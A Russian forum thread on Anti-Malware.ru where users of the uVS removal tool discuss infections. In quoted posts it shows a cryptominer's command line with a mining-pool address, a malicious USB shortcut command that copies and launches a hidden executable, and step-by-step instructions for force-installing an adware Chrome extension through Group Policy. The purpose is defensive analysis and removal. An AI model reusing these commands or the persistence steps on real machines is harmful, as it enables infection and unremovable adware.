Universal Virus Sniffer (uVS), Вопросы разработчику - Страница 60 - Universal Virus Sniffer (uVS) - развитие, использование и решение проблем - Форумы Anti-Malware.ru Перейти к содержанию

Recommended Posts

PR55.RP55

Demkd

Большая просьба...

http://www.anti-malware.ru/forum/index.php...st&p=175852

Я конечно понимаю - люди у нас терпеливые, морально устойчивые...

Но сколько можно ? :(

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Smit

чистить темп не пробовал? плохая шутка ,я начал чистить темпы еще задолго до изобретения этой программы (в основном "батником")

с двумя слэшами давно уже не удаляются ссылки последняя версия пыталась удалить я даже сделал скрини но к сожалению удалил их вместе с другими .. я грешным делом подумал что это именно слеши виноваты...

ps жаль что из за погони за скоростью не хватает времени на исследование, создание образов и пр

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
g0dl1ke

спасибо demkd - при помощи uvs удалось задетектить майнер криптовалюты

https://www.virustotal.com/ru/file/903f8e19...sis/1390733179/

https://www.virustotal.com/ru/file/4ffdc458...sis/1390733181/

собственно опять авторан через шедулер (видимо сейчас это модно)

C:\Users\Alex\AppData\Roaming\Malwarebytes\chrome.exe" --scrypt -o stratum+tcp://37.1.219.68:9007 -u strizon.2 -p x -w 256 -I 11

образ машины: http://rghost.ru/private/51935781/36444fc9...32d522f54a39650

файлы конфигов майнера (если кому то это будет интересно): http://rghost.ru/private/51935937/78272e53...eaaf5d0e3df97a1

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Smit

столкнулся с таким случаем удаляю вирусы программой они восстанавливаться после перезагрузки .

ситуация следующая : вирусы с компьютера превращают все папки на флешке в "невидимые" а вместо них лежат ярлычки (к этим папкам) эмитирующие эти папки ,а также в скрытом виде кладут вирус в корень флеши .

самое интересное это сами модифицированные ярлыки к папкам вот их содержимое :

%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe /c "%SystemRoot%\explorer.exe %cd%[b]название папки жертвы[/b] & attrib -s -h %cd%HKNVAsF.exe & xcopy /F /S /Q /H /R /Y %cd%HKNVAsF.exe %temp%\lrHwn\ & attrib +s +h %cd%HKNVAsF.exe & start %temp%\lrHwn\HKNVAsF.exe & exit"

программа конечно паказывает где лежать вирусы , а также в запуске "неявных или в ручную" тоже но почему при удалении вирусов не удаляются модифицированные ярлычки и посчемуто не палиться вирус на флешке !?

если автору будет интересно и свободное время могу выложить "тушки"

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
если автору будет интересно и свободное время могу выложить "тушки"

Smit, эти "тушки" кто нибудь из антивирусов детектирует? как хоть называется детект? (если он есть)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
g0dl1ke

хотя бы отчет вирустотал бэ

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

ставлю на то, что детектов >20 :)

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Smit

g0dl1ke

priv8v ставлю на то, что детектов >20 smile.gif

тоесть прога не детектит , на свалку ее? или к чему этот ваш стеб?

при чем тут детект вообще? удалять надо не только то что детектится , а еще и причину запуска вирусов как минимум, а как максимум восстановить работу системы как было!

воистину дети рекламы и нода

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v
тоесть прога не детектит , на свалку ее? или к чему этот ваш стеб?

К demkd и его данной деятельности отношусь с уважением и стеба не было. Ссылка на ВТ нужна для того, чтоб все сразу было видно вообще что за файл. Если бы файл понадобился, то я бы его выдал нуждающимся и может какой мини-реверс сделал, коли потребовалось бы. А попытка угадать кол-во детектов - это наш междусобойный юмор (угадывать по имени файла и методу распространения уровень детекта). Разумеется ни кому в голову не приходит, что утилита должна все сигнатурно детектить - не перекладывайте свои мысли в головы других людей :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Smit

priv8v не перекладывайте свои мысли в головы других людей

а я и не мыслил , что кто то мыслил, что я мыслил :"перекладывать мысли"

это могут только экстрасенсы и / или талантливые учителя , спс за лесть!

а если по делу вы ничего не хотели написать? к примеру если бы программа действительно могла удалять модифицированные ярлыки: если удаляется сам файл? или это роскошь!? если антивири этого не делают то и uvs не должен? и тут не нужно знать ни сигнатуры ни чего то особенного, если программа умеет удалять ссылки на удаляемый файл , пусть удаляет и ярлыки на негоже, весьма логично! (ярлык это тоже ссылка, невероятно но факт!)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Demkd

В системе скажем в директории \User Data\Default\Extensions\

Есть .JS объекты.

Этот: https://www.virustotal.com/ru/file/87e92171...sis/1391178703/

Дело в том, что после удаления данная дрянь восстанавливается...

И Браузер снова подгружает данное расширение.

Как средствами системы или uVS можно блокировать запуск этого объекта без отключения JavaScript. ?

7c7d.jpg

post-8956-1391179231_thumb.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

rghost.ru/52095809 :facepalm:

Для установке в Хроме: настройки > расширения > копируем файл на страницу > подтверждаем = получаем удовольствие.

Единственно с правами всё здесь попроще...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
goover

До 28 версии так делалось через реестр с помощью ключей:

_ Software\Policies\Google\Chrome\ExtensionInstallSources

_ Software\Policies\Google\Chrome\ExtensionInstallForcelist

С 28 через политики windows (устанавливается шаблон). Реестр должен игнорироваться.

В адресной строке можно ввести chrome://policy и посмотреть, что покажет.

Установил выложенный на rghost.ru/52095809 через политики :

Image1.png

post-5047-1391199085_thumb.png

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

goover +

Спасибо за помощь.

Теперь дело за Demkd.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

htt*://mediaply.net/mediaplayer/update/updateMediaPlayerV1alpha257.xml

Где MediaPlayerV1alpha***

*** От 257 до 800

На google.com жуткая паника и шпионская паранойя с 30 числа....

Решение _они_ так за три дня и не нашли.

---

629.jpg

post-8956-1391237329_thumb.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
С 28 через политики windows (устанавливается шаблон). Реестр должен игнорироваться.

В адресной строке можно ввести chrome://policy и посмотреть, что покажет.

Установил выложенный на rghost.ru/52095809 через политики :

goover, а можно подробнее, как расширение добавлено через политики. (и где это инфо хранится)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
goover

Опишу как я делал ( Win 7 x32 , Chrome ver. 32 ) :

Тут шаблон политик для хрома: http://www.chromium.org/administrators/policy-templates ( скачать - Zip file of ADM/ADMX templates and documentation ). Из архива нужен - windows\adm\ru\chrome.adm. Добавляем его в gpedit.msc для всех юзеров:

- Конфигурация компьютера - Административные шаблоны. На 'Административные шаблоны' правой кнопкой мыши, в меню жмем 'Добавление и удаление шаблонов'. Добавляем chrome.adm.

На последнем скрине PR55.RP55 видно, что расширение грузится из интернета ( с mediaply.net ). Я грузил с рабочего стола.

Положил на него 3 файла: 1.1_0.crx, 1.1_0.pem (распаковал из архива с расширением) и создал файл update.xml с содержимым

                             <?xml version='1.0' encoding='UTF-8'?>                               <gupdate xmlns='http://www.google.com/update2/response' protocol='2.0'>                               <app appid='ojaliajcmgpnmmalbegllddmoimfnlle'>                                 <updatecheck codebase='file:///C:/Users/user/Desktop/1.1_0.crx' version='1.1' />                               </app>                             </gupdate>

Через gpedit.msc включаем и настраиваем политику:

gpedit_chrome.pnggpedit_chrome_2.png

Запускаем Chrome, открываем любые сайты и любуемся на рекламу и popup-ы.

Что в резальтате получилось:

1) политика сохранилась в реестре

             [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist]               "1"="ojaliajcmgpnmmalbegllddmoimfnlle;file:///C:/Users/user/Desktop/update.xml"

2) политика сохранилась в C:\Users\All Users\ntuser.pol

3) политика сохранилась в C:\Windows\System32\GroupPolicy\Machine\Registry.pol

( может политики ещё где сохраняются, не знаю, в любом случае их надо отключать через соответствующий интерфейс, а не удалять файлы ntuser.pol, Registry.pol, ... :) ).

4) также в \User Data\Default\Extensions\ появилась папка "ojaliajcmgpnmmalbegllddmoimfnlle" с этим расширением.

Ключ в реестре и папку с расширением можно удалить - все равно при старте браузера расширение будет подключаться и работать.

Если писАть только в реестр

             [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist]               "1"="ojaliajcmgpnmmalbegllddmoimfnlle;file:///C:/Users/user/Desktop/update.xml"

то расширение не подключается.

post-5047-1391280561_thumb.png

post-5047-1391280567_thumb.png

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
Ключ в реестре и папку с расширением можно удалить - все равно при старте браузера расширение будет подключаться и работать.

а если после удаления ключа перезагрузить систему? ;) или просто обновить политики gpupdate /force?

в v .10 что уже доступна для обновления ключ с политиками гугля сносится под корень 27-м твиком

а софт от гугля, да, сплошная дыра, спецов по безопасности походу у них вообще нет.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

demkd,

удаление ключа (в реестре) в том числе с gpupdate & restart не решает проблему, политика продожает работать, расширение остается активным и защищенным корпоративной политикой.

---------------

(точнее, это видимо работает для Chrome c v <28.)

в v 32 помогает удаление файла registry.pol. в этом случае административный шаблон сохраняется, но добавленная ранее политика отключается.

т.е. удалять ключ политики следует не из реестра, а через очистку политики из файла registry.pol, если в нее добавляются полезные политики из других административных шаблонов.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
goover
а если после удаления ключа перезагрузить систему? ;) или просто обновить политики gpupdate /force?

ну так попробуйте ;)

https://code.google.com/p/chromium/issues/detail?id=259470

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

goover, в связи с этим вопрос:

политики добавленные из разных административных шаблонов все сохраняются в registry.pol, или для каждого шаблона будет свой файл *.pol?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
goover

Без понятия :)

Я не программист и не системный администратор. И так глубоко данный вопрос не исследовал. На него скорее demkd может ответить.

IMHO, все будут в registry.pol. Только, например, на работе у меня их три:

regpol.png

Если интересно - пробуйте и смотрите :

в дополнение к шаблону хрома можно поставить шаблон для firefox (http://sourceforge.net/projects/gpofirefox...ox.adm/download), включить там и там по политике, и посмотреть что получится. ;)

post-5047-1391681407_thumb.png

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

да, все пишется в Registry.pol

Ну и наконец, в папках Machine и User находятся файлы Registry.pol. Эти файлы появляются, когда в разделе «Административные шаблоны» (Administrative Templates) определяется какой-нибудь параметр. Файл Registry.pol тесно связан с административными шаблонами (.adm). Административные шаблоны содержат параметры реестра, которые возможно сконфигурировать с помощью групповых политик. Ключевое слово здесь – «возможно». Registry.pol содержит сконфигурированные параметры.

Когда вы открываете редактор политик, он создает временную ветвь реестра с двумя узлами: user и machine. Когда вы передвигаетесь по узлам «административных шаблонов» в редакторе политик, редактор политик показывает вам соответствующие разделы административных шаблонов (.adm), подгружая их динамически (после выбора соответствующего раздела шаблонов). Все просмотренные параметры кэшируются.

Когда вы выбираете какую-нибудь политику, редактор политики читает временную ветвь реестра для того, чтобы определить значение этой политики (параметра). Если во временной ветви нет значения, запрашивается значение по умолчанию из .adm файла. Если в .adm файле нет значения по умолчанию, запрашивается соответствующее клиентское расширение.

Все параметры (политики), которые вы определяете в процессе редактирования раздела «Административные шаблоны» GPO, сохраняются во временной ветви реестра. Когда вы закрываете редактор политик, ветвь реестра импортируется в соответствующие файлы Registry.pol (в папке user или machine).

Впоследствии при открытии редактора групповой политики в создаваемую временную ветвь реестра импортируются соответствующие файлы Registry.pol, чтобы вы видели текущие настройки политик.

from ru-board.com

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Smit

Кто подскажет, чем отличается горячая клавиша Ctrl+Z (Отменить предыдущую команду (только при работе с образом)) от Alt+Backspace (Отменить предыдущую команду (только при работе с образом))?

ктото прокомментировал это так :

"ну если у вас вдруг сломалась клавиша Ctrl можно использовать другую комбинацию"

а если без шуток!??

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd

Smit

ничем

goover

спасибо, вроде как я нашел как эти GPO прибивать программно и сразу во всех местах, включу в след версию и почему-то расширение само сносится... наверное так задумано :D

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти

  • Сообщения

    • Ego Dekker
      Домашние антивирусы для Windows были обновлены до версии 19.2.17.
    • santy
      Например: форумы Anti-Malware, официальный и неофициальный технические форумы Касперского разработаны при поддержке Powered by Invision Community Invision Community (ранее IPS Community Suite, Invision Power Board, сокращенно IPS, IP.Suite или IP.Board) — коммерческое программное обеспечение для организации веб-форумов, разрабатываемое американской компанией Invision Power Services Inc ----------- Получается 1С-Битрикс наше все.
    • PR55.RP55
      КОТ ( Комитет Охраны Тепла ) Африка
      Неизбежность войны, предвкушаю крах
      Если я говорю, значит, он прав
      Армагеддон — это больше, чем страх
      Это любовь, это слёзы и кровь
      Твоих сыновей
      Африка!

      [Бридж]
      Твои волосы — как прутья
      Твои мысли — белый мел
      Я однажды не проснулся
      Оттого что я висел

      [Предприпев]
      Африка!
      На твоих руках
      Твоё солнце в моих глазах
      Африка!

      [Припев]
      Чёрное на белом
      Кто-то был неправ
      Я внеплановый сын африканских трав
      Я танцую регги на грязном снегу
      Моя тень на твоём берегу
      Африка!
    • santy
      Я думаю, разработчики закона сами еще не знают как трактовать то, что они сделали. например это: Если владелец сайта является гражданином РФ или российским юридическим лицом является ли система российской, владельцем которой он считается, если сам сайт построен на зарубежном движке?
    • PR55.RP55
      " Запрет на использование иностранных сервисов авторизации (Google, Apple) на российских сайтах, введенный законами № 406-ФЗ и № 670-ФЗ, направлен на локализацию персональных данных и борьбу с утечками, требуя перехода на российские ID-системы, такие как ya.ru или mail.ru [1]. Старые аккаунты, созданные через иностранные сервисы, не удаляются, однако владельцы сайтов обязаны перевести пользователей на легитимные методы входа, включая российскую почту, телефон или Госуслуги, чтобы избежать ответственности за текущие авторизации [1]. " " Владельцы сайтов будут обязаны проводить авторизацию пользователей (например, при регистрации или входе в личный кабинет) с использованием только российских систем. К ним относятся: номер российского телефона; портал "Госуслуги"; единая биометрическая система; иные системы, владельцами которых являются граждане РФ или российские юридические лица." ya.ru или mail.ru - в теории ( и на практике ) граждане р.ф. Сама почта требует авторизации - через номер телефона. т.е. зарегистрированный пользователь уже прошёл авторизацию.  ---------- Оценка выше написанного в ИИ. :) Давайте разберем, почему ваши тезисы и выводы полностью корректны.
      1. Соответствие критериям закона
      Вы абсолютно правы: сервисы *Яндекс (ya.ru)* и *VK (VK ID / Mail.ru)* на
      100% подпадают под четвертый пункт статьи 10.2-1 закона «Об информации»:   * Их владельцами являются *российские юридические лица*.
        * Доля иностранного владения в них приведена в полное соответствие с
          законодательством РФ (контролирующие структуры находятся в
          российской юрисдикции). 2. Цепочка авторизации (наследование доверия)
      Ваша мысль о том, что /«почта требует авторизации через телефон, а
      значит, пользователь уже авторизован»/, юридически называется
      *делегированием авторизации*.   * Закон обязывает владельца форума использовать /российскую систему/
          для входа.
        * Яндекс ID или VK ID — это и есть авторизационные информационные системы.
        * То, что эти ИС внутри себя уже проверили пользователя (по номеру
          телефона, привязке к Госуслугам или через подтвержденный профиль), —
          это их зона ответственности. Для вашего форума главное, что сама
          «входная дверь» (Яндекс/VK) является российской. 3. Обязанности владельца сайта
      Приведенная вами цитата точно описывает текущее положение дел:   * *Закон не требует удалять профили* людей, вошедших когда-то через
          Google.
        * *Закон запрещает процесс* предоставления авторизации через
          иностранцев /сейчас/.
        * Чтобы не получить штраф (вступивший в силу по законопроекту №
          1110676-8), владелец сайта должен закрыть техническую возможность
          кликнуть на «Вход через Google/Apple» и предложить пользователю
          привязать к старому аккаунту российский аналог (почту, телефон или
          Яндекс/VK ID). ------- Но лучше всё это ещё уточнить.    
×